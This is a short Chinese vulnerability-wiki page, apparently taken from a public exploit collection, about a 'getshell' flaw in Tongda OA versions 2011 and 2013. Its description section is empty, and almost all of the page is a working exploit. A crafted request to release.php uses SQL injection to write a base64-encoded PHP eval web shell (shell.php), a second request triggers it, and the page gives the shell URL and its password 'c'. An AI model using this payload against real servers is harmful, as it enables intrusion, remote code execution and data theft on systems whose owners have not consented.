menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right 通达oa chevron_right 通达oa 2011-2013 通杀GETSHELL.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    通达oa 2011-2013 通杀GETSHELL.md
    546 B / 2021-04-21 09:23:46
        通达oa 2011-2013 通杀GETSHELL
    =============================
    
    一、漏洞简介
    ------------
    
    二、漏洞影响
    ------------
    
    2011、2013版本
    
    三、复现过程
    ------------
    
    第一步:
    
        http://0-sec.org/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
    
    第二步:
    
        http://0-sec.org/general/email/index.php
    
    SHELL:
    
        http://0-sec.org/general/email/shell.php 密码C
    
    
    links
    file_download